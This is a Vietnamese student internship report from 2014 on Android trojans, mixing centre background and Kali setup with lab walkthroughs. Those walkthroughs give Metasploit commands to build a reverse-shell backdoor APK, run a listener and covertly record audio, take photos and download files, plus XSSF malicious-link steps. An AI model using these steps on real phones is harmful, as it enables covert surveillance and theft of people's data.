1. 1
ĐẠI HỌC QUỐC GIA TP HỒ CHÍ MINH
TRƯỜNG ĐẠI KHOA HỌC TỰ NHIÊN
KHOA ĐIỆN TỬ VIỄN THÔNG
------
TRUNG TÂM ĐÀO TẠO QUẢN TRỊ
VÀ AN NINH MẠNG QUỐC TẾ
ATHENA
------
BÁO CÁO THỰC TẬP
DOANH NGHIỆP
ĐỀTÀI : NGHIÊN CỨU CÁC TROJAN, MALWARE
CHO PHÉP ĐÁNH CẮP DỮ LIỆU NHƯ DANH
SÁCH LIÊN LẠC, TIN NHẮN TRÊN ĐIỆN THOẠI
SỬ DỤNG ANDROID VÀ GỬI RA NGOÀI
Giáo viên hướng dẫn : THẦY VÕ ĐỖ THẮNG
Sinh viên thực hiện : NGUYỄN VĂN THIÊN
MSSV : 1120163
TP HỒ CHÍ MINH, THÁNG 11 NĂM 2014
2. 2
NHẬN XÉT
(Của giáo viên hướng dẫn )
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.........................................................................................................................................
.......................... , ngày …… tháng …… năm ..........
Giáo viên hướng dẫn
3. 3
Hình ảnh chụp với giáo viên hướng dẫn thầy Võ Đỗ Thắng
4. 4
MỤC LỤC
LỜI CẢM ƠN
1
MỞ ĐẦU
2
LỜI CAM KẾT
3
PHẦN I : TỔNG QUAN VỀ TRUNG TÂM
I, Giới thiệu chung về Trung Tâm
4
II, Quá trình hình thành và phát triển
4
III, Cơ sở vật chất
4
IV, Đội ngũ giảng viên
5
V,Lĩnh vực hoạt động chính
5
VI, Dịch vụ hổ trợ
6
PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP
I, Thời gian thực tập
7
II, Liệt kê nội dung thực tập
7
PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT
I, Nghiên cứu cài đặt Kali trên máy ảo VMware
1, Chuẩn bị
9
5. 5
2, Cài đặt máy ảo
10
3, Cài đặt kali trên máy ảo
15
II, Tạo Applications chứa mã độc trên kali linux tấn công thiết bị Android.
1, Tạo Applications chứa mã độc
21
2, Tiến hành khai thác dữ liệu
26
III, Tạo liên kết chứa mã độc trên kali và sử dụng tấn công thiết bị Android
1, Tạo liên kết chứa mã độc
31
2, Tiến hành khai thác dữ liệu
33
6. 6
IV, TỔNG QUAN VỀ ANDROID
1, Giới thiệu
37
2, Đặc điểm
39
3, So sánh Android 2.x và 4.x
40
V, TẠO MÁY ẢO ANDROID TRÊN ECLIPSE
1, Bộ Java SE Development Kit (JDK)
43
2, Eclipse IDE và Android SDK
45
3. Tích hợp Android SDK và Eclipse
48
VI, KẾT NỐI MÁY CHỦ ẢO VPS
1, Giới thiệu máy chủ ảo VPS
51
2, Đặc điểm của VPS 51
3, Giá trị khi sử dụng VPS
52
4, Kết nối VPS
52
VII, CÀI ĐẶT METASPLOIT TRÊN VPS
1, Giới thiệu về phần mềm Metasploit
53
2, Giới thiệu payload Meterpreter
53
3, Cài đặt Metasploit
54
IIX, TẤN CÔNG MÁY ANDROID TỪ MÁY VPS
7. 7
1, Tạo ứng dụn chứa mã độc trên Kali lunix
56
2, Tấn công điện thoại Android
56
3, Các phuowg thức tấn công được sử dụng
57
PHỤ LỤC I : VIDEO QUÁ TRÌNH THỰC HIỆN
62
PHỤ LỤC II : DANH SÁCH BÁO CÁO QUÁ TRÌNH
63
PHỤ LỤC III : TÀI LIỆU THAM KHẢO
64
NHẬT KÝ THỰC TẬP
PHIẾU KHẢO SÁT LẦN 1, LẦN 2, LẦN 3
8. 8
LỜI CẢM ƠN
Trước hết em xin gửi lời cảm ơn và lòng biết ơn sâu sắc đến thầy Võ Đỗ
Thắng, các thầy và anh chị trong Trung tâm ATHENA đã tận tình giúp đỡ, chỉ bảo
và hướng dẫn em trong suốt thời gian thực tập. Trong suốt thời gian làm việc với
thầy và trung tâm em không ngừng tiếp thu thêm nhiều kiến thức bổ ích mà còn học
tập được tinh thần làm việc, thái độ nghiên cứu nghiêm túc, hiệu quả, chi tiết, và
làm quan được với môi trường làm việc công nghiệp. Đây là những điều rất cần
thiết cho em trong quá trình học tập và làm việc sau này.
Em cũng xin gửi lời cảm ơn đến các thầy cô trong trường Đại học Khoa Học
Tự Nhiên – TP Hồ Chí Minh nói chung và các thầy cô trong khoa Điện Tử Viễn
Thông, bộ môn Máy tính – Hệ thống nhúng nói riêng đã tận tình giảng dạy, truyền
đạt cho em những kiến thức, kinh nghiệm quý báu trong suốt bốn năm qua để em
vững bước trên con đường học tập và công việc của mình sau này.
Em xin chân thành cảm ơn văn phòng Athena tại 92 Nguyễn Đình Chiểu đã
đã giúp em có được môi trường làm việc tốt nhất đồng thời cung cấp trang thiết bị
giúp tôi có thể hoàn thành khóa thực tập này.
Được sự giúp đỡ của Thầy và bạn bè, cùng với những nỗ lực của bản thân,
em đã hoàn thành khóa thực tập doanh nghiệp đề tài “Nghiên cứu các Trojan,
Malware cho phép đánh cắp dữ liệu trên thiết bị điện thoại sử dụng Android và gửi
ra ngoài” xin kính trình Quý Thầy Cô xem xét và chấm điêm. Do trình độ nghiên
cứu và thời gian có hạn, báo cáo của em chắc chắn không tránh khỏi có sự thiếu sót
và hạn chế. Rất mong được sự góp ý và chỉ dẫn của Thầy cô. Em xin chân thành
cảm ơn
TP. Hồ Chí Minh, ngày 1 tháng 11 năm 2014
Sinh viên
Nguyễn Văn Thiên
9. 9
MỞ ĐẦU
Khi bắt đầu tìm kiếm môi trường phù hợp cho việc thực tập, em đã đặt cho
mình các mục tiêu sau:
- Tiếp cận với môi trường doanh nghiệp để học cách làm việc của họ.
- Nắm được quy trình phát triển phần mềm đang được áp dụng đồng thời tiếp
cận được công nghệ mới.
- Sử dụng được những kiến thức đã học trong 3 năm đầu.
- Nhận được những kiến thức cần thiết cho công việc mà không được đề cập
trên giảng đường.
- Trau dồi các kỹ năng bản thân, nhất là kỹ năng làm việc nhóm và khả năng
sử dụng tiếng Anh chuyên ngành.
Xét thấy 5 mục tiêu trên là cần thiết với một sinh viên sắp rời khỏi ghế nhà
trường, em cố gắng tìm kiêm một công ty, doanh nghiệp hay trung tâm có thể đáp
ứng được mong muốn của mình. Sau một thời gian dài tìm hiểu và thăm dò qua bạn
bè và người thân thấy “Trung Tâm Đào Tạo Quản Trị Mạng và An Ninh Mạng
Quốc Tế ATHENA” nhận sinh viên thực tập về các đề tài công nghệ di động, hệ
điều hành di động Android mà em đang muốn tìm hiểu. Em quyết định nộp hồ sơ
ứng tuyển vị trí thực tập sinh 2 tháng tại Trung tâm ATHENA, và đã được trung
tâm nhận vào vị trí thực tập viên 2 tháng.
Ngày 21/7/2014 em bắt đầu quá trình thực tập của mình ở trung tâm ATHENA.
10. 10
LỜI CAM KẾT
Em xin cam kết:
· Những nội dung trong báo cáo này là do em tự thực hiện với sự hướng dẫn
của Thầy, cán bộ và các bạn tại Trung Tâm ATHENA.
· Mọi tham khảo trong quá trình thực hiện báo cáo đều được trích dẫn rõ ràng
về nguồn về nội dung, tác giả, địa chỉ tham khảo.
· Nếu sao chép không hợp lệ, vi phạm quy chế đào tạo, hay gian lận, em xin
chịu hoàn toàn trách nhiệm.
TP. Hồ Chí Minh, ngày 01 tháng 11 năm 2014
Sinh viên
Nguyễn Văn Thiên
11. 11
PHẦN I : TỔNG QUAN VỀ TRUNG TÂM
I.Giới thiệu chung về Trung Tâm
+ Tên : Trung tâm đào tạo Quản trị mạng và An ninh mạng quốc tế Athena
+ Địa chỉ :
- Cơ sở 1 : 92 Nguyễn Đình Chiểu, phường Đa Kao, Q1,Tp.HCM
- Cở sở 2 : 2 Bis Đinh Tiên Hoàng, phường Đa Kao, Q1,Tp.HCM
+ Điện thoại : (08)38244041
+ Email : support @athena.edu.vn & tuvan@athena.edu.vn
+ Website : www.athena.edu.vn
+ Logo :
II. Quá trình hình thành và phát triển
Trung Tâm Đào Tạo Quản Trị Mạng & An Ninh Mạng Quốc Tế ATHENA
được thành lập từ năm 2004, là một tổ chức qui tụ nhiều trí thức trẻ Việt Nam
đầy năng động, nhiệt huyết và kinh nghiệm trong lãnh vực CNTT, với tâm
huyết góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là
ngành kinh tế mũi nhọn, góp phần phát triển nước nhà .
III. Cơ sở vật chất
-Thiết bị đầy đủ và hiện đại
-Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những
12. 12
công nghệ mới nhất.
-Phòng máy rộng rãi, thoáng mát
IV. Đội ngũ giảng viên
Tất cả các giảng viên trung tâm ATHENA có đều tốt nghiệp từ các trường
đại học hàng đầu trong nước,... Tất cả giảng viên ATHENA đều phải có các
chứng chỉ quốc tế như MCSA, MCSE, CCNA, CCNP, Security+, CEH, có
bằng sư phạm Quốc tế (Microsoft Certified Trainer). Đây là các chứng chỉ
chuyên môn bắt buộc để đủ điều kiện tham gia giảng dạy tại trung tâm
ATHENA.
Bên cạnh đó,Các giảng viên ATHENA thường đi tu nghiệp và cập nhật kiến
thức công nghệ mới từ các nước tiên tiến như Mỹ, Pháp, Hà Lan, Singapore,...
và truyền đạt các công nghệ mới này trong các chương trình đào tạo tại trung
tâm ATHENA.
V. Lĩnh vực hoạt động chính
Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo chuyên sâu
quản trị mạng, an ninh mạng, thương mại điện tử theo các tiêu chuẩn quốc tế
của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song
song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành
riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An ,
ngân hàng, doanh nghiệp, các cơ quan chính phủ, tổ chức tài chính..
Sau gần 10 năm hoạt động,nhiều học viên tốt nghiệp trung tâm ATHENA đã
là chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng cho
nhiều bộ ngành như Cục Công Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công
An, Sở Thông Tin Truyền Thông các tỉnh, bưu điện các tỉnh,....
Ngoài chương trình đào tạo, Trung tâm ATHENA còn có nhiều chương trình
hợp tác và trao đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa
Thành Phố Hồ Chí Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện
13. 13
Bưu Chính Viễn Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật
Quân Sự
14. 14
VI. Dịch vụ hỗ trợ:
- Đảm bảo việc làm cho học viên tốt nghiệp khoá dài hạn.
- Giới thiệu việc làm cho mọi học viên.
- Thực tập có lương cho học viên khá giỏi.
- Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không
giới hạn thời gian.
- Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy
tính, mạng máy tính, bảo mật mạng.
- Hỗ trợ thi Chứng chỉ Quốc tế...
15. 15
PHẦN II : THỐNG KÊ QUÁ TRÌNH THỰC TẬP
I. Thời gian thực tập
+ Thời gian bắt đầu : 24/07/2014
+ Thời gian kết thúc : 03/11/2014
+ Giờ lên trung tâm :7h30 đến 10h00 thứ 3,5,7 /tuần
II. Liệt kê nội dung thực tập
Thời gian Nội dung công việc
Ngày 24/7/2014 - Gặp giáo viên hướng dẫn, nhận đề tài thực tập
và tài liệu hướng dẫn.
Tuần 1
(24/7/2014 – 29/7/2014)
- Cài đặt máy ảo Kali Linux trên phần mềm
VMware workstation.
- Nghiên cứu cơ chế tạo mã độc trên kali linux
Tuần 2
(31/7/2014 – 05/8/2014)
- Thực hành tạo mã độc trên kali linux và tấn
công thiết bị di động sử dụng hệ điều hành
Android
- Quay video giới thiệu bản thân
Tuần 3
(07/8/2014 – 14/8/2014)
- Nghiên cứu tích hợp mã độc lên phần mềm
- Thực hành tích hợp mã độc lên phần mềm
- Nghiên cứu khai thác data trên smart phone
Tuần 4
(16/8/2014 – 23/8/2014)
- Thực hành khai thác trên các thiết bị smart
phone
- Tấn công Android qua đường link liên kết mã
độc nhờ XSSF
Tuần 5
(26/8/2014 – 04/9/2014)
- Cài đặt Trojan qua ứng dụng iCalendar và
iMatch
Tuần 6-7 - Tìm hiểu máy chủ ảo VPS.
16. 16
(06/9/2014 – 20/8/2014) - Tìm hiểu phần mềm Metasploit.
- Cài đặt Metasploit trên máy chủ ảo VPS.
Tuần 8
(22/9/2014 – 28/9/2014)
- Cài đặt Metasploit trên máy chủ ảo VPS
- Tham gia học và thi khóa học system hacking
Tuần 9
(30/9/2014 – 5/10/2014)
- Nghiên cứu việc tấn công vào điện thoại
Android thật từ máy chủ ảo VPS.
- Thực hành tấn công vào điện thoại Android từ
máy chủ ảo VPS
Tuần 10
(6/10/2014 – 12/10/2014)
- Tổng hợp và làm báo cáo tổng kết
3/11/2014 - Báo cáo tổng kết
17. 17
PHẦN III : NỘI DUNG THỰC TẬP CHI TIẾT
I. Nghiên cứu cài đặt Kali Linux trên máy ảo VMware.
1, Chuẩn bị
· Phần mềm VMware : Hiện nay phần mềm tạo máy ảo là một phần mềm
được sử dụng rộng rãi. Ở bài báo cáo này mình cũng sử dụng VMware để tạo
máy ảo. Các bạn cần download là tiến hành cài đặt phần mềm này. Ở đây
mình sẽ không giới thiệu kỹ về phần này.
Hướng dẫn cụ thể các bạn có thể tham khảo tại:
https://www.youtube.com/watch?v=43O5Glide5M
· Tải về file ISO phiên bản mới nhất của phần mềm Kali Linux. Các bạn có
thể tải tại địa chỉ sau:
http://www.kali.org/downloads
Ta chọn thư mục để lưu. Các bạn cần nhớ thư mục mà các bạn chọn lưu này, vì
18. 18
lúc cài ta sẽ sử dụng nó. Sau khi tải về ta sẽ có File ISO như sau.
2, Cài đặt
Sau khi đã có phần mềm VMware và file ISO của kali ta tiến hành cài đặt Kali trên
máy ảo.
B1: Tiến hành mở VNware và tạo máy ảo mới
Sau đó chọn chế độ Custom và next
20. 20
B2: Chọn file ISO của kali đã download trước đó bằng cách chọn đường dẫn đến
thu mục đã lưu. Sau đó tiếp tục.
21. 21
B3: Chọn hệ điều hành. Chọn Linux->Debian 7 64bit, sau đó next
22. 22
B4: Đặt tên cho máy ảo và, nơi lưu. Ở đây mình đặt tên cho may ảo là MayAo1, lưu
tại địa chỉ mặc đinh, các bạn cũng có thể chọn nơi lưu khác.
23. 23
B5: Cài đặt các thông số bộ nhớ
Tùy theo cấu hình của máy thật mà các bạn chọn dung lượng bộ nhớ cho máy ảo. Ở
đây máy mình dung lượng là 4Gb, mình sẽ chon dung lượng cho máy ảo là 1Gb.
Sau đó next
24. 24
B6: Chọn chế độ Network
Chọn LSI Logic -> next, sau đó chọn SCSI -> next
26. 26
Chọn Create a new virtual disk -> next -> next
Tiếp tục next cho đến khi Finish
27. 27
Đến đây ra đã tạo xong máy ảo. Tiến hành cài đặt kali trên máy ảo.
28. 28
3, Cài đặt kali trên máy ảo
B1: Khởi động máy ảo đã tạo. Chọn Graphic Install
Sau đó chọn ngôn ngữ máy sử dụng.
Sau đó máy ảo sẽ tiến hành cài đặt.
37. 37
II. Tạo Applications chứa mã độc trên kali linux và sử dụng để tấn công thiết
bị Android.
1, Tạo Applications chứa mã độc
Ta sẽ sử dụng Metasploit framework trên Kali linux để tạo một payload, khi
các thiết bị android download và cài đặt payload này lên thiết bị thì chúng ta có thể
xâm nhập để khi thác dữ liệu cũng như điều khiển thiết bị này.
Ở đây chúng ta sử dụng Kali linux trên VMware.
Trước tiên ta cần thiết lập Netwwork trên VMware. Vào VM -> setting…
Chọn thiết lập như hình
39. 39
Sau đó vào Edit -> Virtual Network Editor...
Trên phần Bridge (connect VMs directly to the external network) ta sẽ chọn adapter
của máy thật mà ta đang sử dụng.
Sau khi thiết lập hoàn tất trên VNware ta tiến hành mở máy Kali linux đã được tạo
trước đó và tiến hành tạo file mã độc.
Sau khi khởi động máy ảo Kali linux ta tiến hành mở cửa sổ terminal và kiểm tra
IP của máy ảo bằng lệnh ifconfig.
40. 40
Như hình ta thấy IP của máy ảo ở đây là 192.168.85.128
Sau đó gõ dòng lệnh sau:
msfpayload android/meterpreter/reverse_tcp lhost=192.168.85.128 lport=8080
R > /root/Desktop/madoc.apk
Lưu ý địa chỉ IP trong dòng lệnh trên là IP của máy ảo Kali ( địa chỉ mà chúng ta có
trước đó ).
Còn 8080 là số port, ta có thể sử dụng một số khác nhưng không nên chọn các port
hay dùng.
41. 41
Sau khi thực hiện câu lệnh trên hệ thông sẽ tạo một file madoc.apk trên desktop
của máy ảo, đây chính là một Metasploit reverse tcp backdoor.
Sau đó quay lại cửa sổ terminal nhập lệnh mfsconsole và chờ câu lệnh load xong
như hình sau.
42. 42
Sau đó ta tạo một handler để xử lí dữ liệu truyền về bằng cách gõ các lệnh sau:
use exploit/multi/handler
set payload android/meterpreter/reverse_tcp
set lhost 192.168.85.128 – nhập địa chỉ IP giống với khi tạo payload ở trên.
set lport 8080– nhập port giống với port khi tạo payload ở trên.
Exploit
Sau khi nhập xong các câu lệnh trên màn hình sẽ xó dạng như sau:
Lúc này ta đang chờ thiết bị android muốn xâm nhập mở backdoor.
Vậy là chúng ta đã tạo xong mã độc để xâm nhập android.
43. 43
2, Tiến hành khai thác dữ liệu thông qua Applications chứa mã độc
Khi máy android cài đặt và chạy ứng dụng chứa mã độc thì xuất hiện giao diện như
sau, nếu ra nhấn vào Reverse TCP có nghĩ là máy android mà máy chủ kali lunix đã
được kết nối với nhau
Khi đó trên Kali ta nhận được thông báo có thiết bị truy cập vào làm nạn nhân.
44. 44
Dùng lệnh “help” để liệt kê các lệnh mà ta có thể thực hiện được.
2.1, Khai thác thông tin hê thống:
Xem thông tin hệ thống bằng lệnh “sysinfo”.
46. 46
2.2, Ghi âm lén:
Ghi âm lén ở thiết bị nạn nhân Android và lưu về máy tấn công Kali bằng lệnh
“record_mic”.
File ghi âm được là xLijsRbg.wav lưu tự động ở /root của máy Kali.
2.3, Khai thác webcam và chụp ảnh lén:
Kiểm tra danh sách webcam của thiết bị nạn nhân Android và thực hiện chụp
ảnh lén, lưu về máy tấn công Kali bằng lệnh “webcam_list” và “webcam_snap
<mã webcam>”.
47. 47
File ảnh chụp được là FRumITki.jpeg lưu tự động ở /root của máy Kali
.
2.4, Khai thác file hệ thống của máy nạn nhân:
Kiểm tra các file hệ thống đang hoạt động bằng lệnh “ps”.
48. 48
2.5, Khai thác dữ liệu từ SDCARD:
Di chuyển vào bộ nhớ SDCARD bằng lệnh “cd /sdcard”.
Dùng lệnh “ls” để liệt kê danh sách các thư mục/tập tin có trong SDCARD.
Xem các tập tin mà máy nạn nhân đã tải về qua lệnh di chuyển thư muc “cd
Download” và lệnh liệt kê “ls”.
49. 49
Đánh cắp và tải về tập tin bất kì bằng lệnh “download <tên tập tin>”.
Ở đây dùng lệnh “download appsX.apk”.
Tập tin appsX.apk vừa đánh cắp về được lưu tự động trong /root của máy tấn
công Kali.
2.6, Kết thúc tấn công:
Dùng lệnh “exit” để thoát khỏi Metasploit và kết thúc quá trình tấn công.
50. 50
III. Tạo liên kết chứa mã độc trên kali linux và sử dụng để tấn công thiết bị
Android
1, Tạo Liên kết chứa mã độc
Bước 1: Khởi động máy tấn công Kali Linux và thiết bị nạn nhân Android.
Bước 2: Ở máy Kali > Mở Terminal > thực hiện 3 lệnh sau để cập nhật
Framework
“msfupdate”
“cd /opt/metasploit/apps/pro/msf3”
“svn export http://xssf.googlecode.com/svn/trunk/ ./ --force”
Bước 3: Khởi động Metasploit bằng lệnh “msfconsole”
Bước 4: Vào XSSF bằng lệnh “load xssf Port=80 Uri=/xssf/ Public=true
Mode=Verbose”
52. 52
Bước 5: Thực hiện lệnh “xssf_urls”
Ta nhận được các urls (đường dẫn web http) như của XSSF Server, XSSF test
page, XSSF logs page…
Bước 6: Cho máy nạn nhân truy cập vào đường dẫn XSSF test page:
http://192.168.149.136:80/xssf/test.html
53. 53
2, Tiến hành khai thác dữ liệu thông qua Liên kết chứa mã độc
Khi máy nạn nhân truy cập vào địa chỉ có chứa mã độc thì máy nạn nhân và máy
chủ kali lunix được kết nối với nhau
Khi đó ở máy chủ Kali sẽ có thông báo là có một máy nạn nhân
2.1, Kiểm tra số lượng nạn nhân đang truy cập vào đường dẫn mã độc:
Ta dùng lệnh “xssf_victims” để kiểm tra số lượng nạn nhân truy cập vào đường dẫn
mã độc http://192.168.149.136:80/xssf/test.html
54. 54
2.2, Xem thông tin về nạn nhân đang truy cập:
Dùng lệnh “xssf_information <ID máy nạn nhân>”
Ở đây ví dụ là “xssf_information 1”
2.3, Khai thác dữ liệu từ máy nạn nhân:
· Đầu tiên ta dùng lệnh “search auxiliary/xssf” để kiểm tra các quyền mà ta có
thể thao tác lên máy nạn nhân
55. 55
· Gửi Thông báo XSSF đến máy nạn nhân qua lệnh:
“use auxiliary/xssf/public/misc/alert”
“run”
Ở máy nạn nhân sẽ nhận được cảnh báo XSSF
56. 56
Thoát ra msf bằng lệnh “Ctrl+C” > “back”
· Kiểm tra xem nạn nhân có truy cập vào các trang web thông dụng hay không
bằng lệnh:
“use auxiliary/xssf/public/misc/visited_pages”
“run”
· Cài đặt 1 đường dẫn mới và qua đó kiểm tra thông tin máy nạn nhân lần nữa:
“use auxiliary/gather/android_htmlfileprovider”
“set SRVPORT 87”
“set URIPATH /”
“run”
57. 57
Chờ nạn nhân truy cập vào đường dẫn mới http://192.168.149.136:87/
Ta nhận được thông tin máy nạn nhân:
2.4, Thoát khỏi XSSF của Metasploit:
Để thoát khỏi ta thực hiện các lệnh: “Ctrl + C” > “back” > “exit” > “exit”
58. 58
IV. TỔNG QUAN VỀ ANDROID
1. Giới thiệu:
- Tổng công ty Android (Android, Inc.) được thành lập tại Palo Alto, California
vào tháng 10 năm 2003 bởi Andy Rubin (đồng sáng lập công ty Danger), Rich
Miner (đồng sáng lập Tổng công ty Viễn thông Wildfire), Nick Sears (từng là Phó
giám đốc T-Mobile), và Chris White (trưởng thiết kế và giao diện tại WebTV) để
phát triển, theo lời của Rubin, "các thiết bị di động thông minh hơn có thể biết được
vị trí và sở thích của người dùng". Dù những người thành lập và nhân viên đều là
những người có tiếng tăm, Tổng công ty Android hoạt động một cách âm thầm, chỉ
tiết lộ rằng họ đang làm phần mềm dành cho điện thoại di động. Trong năm đó,
Rubin hết kinh phí. Steve Perlman, một người bạn thân của Rubin, mang cho ông
10.000 USD tiền mặt nhưng từ chối tham gia vào công ty.
- Google mua lại Tổng công ty Android vào ngày 17 tháng 8 năm 2005, biến nó
thành một bộ phận trực thuộc Google. Những nhân viên của chủ chốt của Tổng
công ty Android, gồm Rubin, Miner và White, vẫn tiếp tục ở lại công ty làm việc
sau thương vụ này. Vào thời điểm đó không có nhiều thông tin về Tổng công ty,
nhưng nhiều người đồn đoán rằng Google dự tính tham gia thị trường điện thoại di
động sau bước đi này. Tại Google, nhóm do Rubin đứng đầu đã phát triển một nền
tảng thiết bị di động phát triển trên nền nhân Linux. Google quảng bá nền tảng này
cho các nhà sản xuất điện thoại và các nhà mạng với lời hứa sẽ cung cấp một hệ
thống uyển chuyển và có khả năng nâng cấp. Google đã liên hệ với hàng loạt hãng
phần cứng cũng như đối tác phần mềm, bắn tin cho các nhà mạng rằng họ sẵn sàng
hợp tác với các cấp độ khác nhau.
- Ngày càng nhiều suy đoán rằng Google sẽ tham gia thị trường điện thoại di động
xuất hiện trong tháng 12 năm 2006. Tin tức của BBC và Nhật báo phố Wall chú
thích rằng Google muốn đưa công nghệ tìm kiếm và các ứng dụng của họ vào điện
thoại di động và họ đang nỗ lực làm việc để thực hiện điều này. Các phương tiện
truyền thông truyền thống lẫn online cũng viết về tin đồn rằng Google đang phát
triển một thiết bị cầm tay mang thương hiệu Google. Một vài tờ báo còn nói rằng
59. 59
trong khi Google vẫn đang thực hiện những bản mô tả kỹ thuật chi tiết, họ đã trình
diễn sản phẩm mẫu cho các nhà sản xuất điện thoại di động và nhà mạng. Tháng 9
năm 2007, InformationWeek đăng tải một nghiên cứu của Evalueserve cho biết
Google đã nộp một số đơn xin cấp bằng sáng chế trong lĩnh vực điện thoại di động.
- Ngày 5/11/2007, Liên minh thiết bị cầm tay mở (Open Handset Alliance), một
hiệp hội bao gồm nhiều công ty trong đó có Texas Instruments, Tập đoàn
Broadcom, Google, HTC, Intel, LG, Tập đoàn MarvellTechnology, Motorola,
Nvidia, Qualcomm, Samsung Electronics, Sprint Nextel và T-Mobile được thành
lập với mục đích phát triển các tiêu chuẩn mở cho thiết bị di động. Cùng ngày,
Android cũng được ra mắt với vai trò là sản phẩm đầu tiên của Liên minh, một nền
tảng thiết bị di động được xây dựng trên nhân Linux phiên bản 2.6. Chiếc điện
thoại chạy Android đầu tiên được bán ra là HTC Dream, phát hành ngày 22 tháng
10 năm 2008. Biểu tượng của hệ điều hành Android mới là một con rôbốt màu
xanh lá cây do hãng thiết kế Irina Blok tại California vẽ.
- Từ năm 2008, Android đã trải qua nhiều lần cập nhật để dần dần cải tiến hệ điều
hành, bổ sung các tính năng mới và sửa các lỗi trong những lần phát hành trước.
Mỗi bản nâng cấp được đặt tên lần lượt theo thứ tự bảng chữ cái, theo tên của một
món ăn tráng miệng; ví dụ như phiên bản 1.5 Cupcake (bánh bông lan nhỏ có kem)
tiếp nối bằng phiên bản 1.6 Donut (bánh vòng). Phiên bản mới nhất là 4.2 Jelly
Bean (kẹo dẻo). Vào năm 2010, Google ra mắt loạt thiết bị Nexus - một dòng sản
phẩm bao gồm điện thoại thông minh và máy tính bảng chạy hệ điều hành Android,
do các đối tác phần cứng sản xuất. HTC đã hợp tác với Google trong chiếc điện
thoại thông minh Nexus đầu tiên, Nexus One. Kể từ đó nhiều thiết bị mới hơn đã
gia nhập vào dòng sản phẩm này, như điện thoại Nexus 4 và máy tính bảng Nexus
10, lần lượt do LG và Samsung sản xuất. Google xem điện thoại và máy tính bảng
Nexus là những thiết bị Android chủ lực của mình, với những tính năng phần cứng
và phần mềm mới nhất của Android.
60. 60
2. Đặc điểm:
- Tính mở: Android được xây dựng từ dưới đi lên cho phép người phát triển tạo
các ứng dụng di động hấp dẫn với đầy đủ các điểm mạnh của các thiết bị cầm tay
hiện có. Android hoàn toàn mở, một ứng dụng có thể gọi tới bất kể một chức năng
lõi của điện thoại như tạo cuộc gọi, gửi tin nhắn hay sử dụng máy ảnh, cho phép
người phát triển tạo phong phú hơn, liên kết hơn các tính năng cho người dùng.
Android được xây dựng trên nhân Linux mở. Thêm nữa, nó sử dụng một máy ảo mà
đã được tối ưu hóa bộ nhớ và phần cứng với môi trường di động. Android mà một
mã nguồn mở, nó có thể được mở rộng để kết hợp tự do giữa các công nghệ nổi trội.
Nền tảng này sẽ tiếp tục phát triển bởi cộng đồng phát triển để tạo ra các ứng dụng
di động hoàn hảo.
- Tính ngang bằng của các ứng dụng:
Với Android, không có sự khác nhau giữa các ứng dụng điện thoại cơ bản với ứng
dụng của bên thứ ba. Chúng được xây dựng để truy cập như nhau tới một loạt các
ứng dụng và dịch vụ của điện thoại. Với các thiết bị được xây dựng trên nền tảng
Android, người dùng có thể đáp ứng đầy đủ các nhu cầu mà họ thích. Chúng ta có
thể đổi màn hình nền, kiểu gọi điện thoại, hay bất kể ứng dụng nào. Chúng ta thậm
chí có thể hướng dẫn điện thoại chỉ xem những ảnh mình thích.
- Phá vỡ rào cản phát triển ứng dụng:
Android phá vỡ rào cản để tạo ứng dụng mới và cải tiến. Một người phát triển có
thể kết hợp thông tin từ trang web với dữ liệu trên điện thoại cá nhân – chẳng hạn
như danh bạ, lịch hay vị trí trên bản đồ – để cung cấp chính xác hơn cho người
khác. Với Android, người phát triển có thể xây dựng một ứng dụng mà cho phép
người dùng xem vị trí của những người bạn và thông báo khi họ đang ở vị trí lân
cận. Tất cả được lập trình dễ dàng thông qua sự hỗ trợ của MapView và dịch vụ
định vị toàn cầu GPS.
- Xây dựng ứng dụng dễ dàng và nhanh chóng:
Android cung cấp bộ thư viện giao diện lập trình ứng dụng đồ sộ và các công cụ để
viết các ứng dụng phức tạp. Ví dụ, Android có thể cho phép người phát triển biết
61. 61
được vị trí của thiết bị và cho phép các thiết bị giao tiếp với nhau để có thể tạo nên
mạng xã hội chia sẻ ngang hàng rộng khắp. Thêm nữa, Android còn bao gồm một
bộ công cụ đầy đủ giúp cho việc phát triển trở nên dễ dàng.
3. Tìm hiểu sự giống nhau và khác nhau của phiên bản Android 2.x và 4.x:
Theo thống kê tình hình những phiên bản hệ điều hành Android công bố đầu
tháng 9 này đã cho thấy có nhiều sự thay đổi lớn. Phiên bản Gingerbread (2.3.x) dù
đã ra mắt rất lâu rồi nhưng vẫn về vị trí thứ 2 với 30,7% thị phần, đứng sau phiên
bản Jelly Bean (4.1.x và 4.2.x) với 45,1% thị phần và về vị trí thứ 3 là phiên bản Ice
Cream Sandwich (4.0.x) với 21,7% thị phần.
Ta có thể tải các tài liêu về các phiên bản Android do Google công bố ở link sau
để nghiên cứu và tìm hiểu: http://source.android.com/compatibility/downloads.html
Ở đây ta sẽ thấy được 4 điểm khác nhau rõ nét nhất của 2 phiên bản này:
- Giao diện (Graphical User Interface)
- Tính năng (Functionality)
- Giao thức mạng (Network Protocol)
- Yêu cầu phần cứng (Hardware)
3.1 Giao diện người dùng:
Android 2.3 Android 4.0
Giao diện đơn giản Giao diện trong suốt, tinh tế và
phong cách hơn
Không hỗ trợ phím ảo Hỗ trợ phím ảo
Không có widgets menu Có widgets menu
62. 62
3.2. Tính năng:
Android 2.3 Android 4.0
Tối ưu hóa cho smart phone Tối ưu hóa cho cả tablets và smart
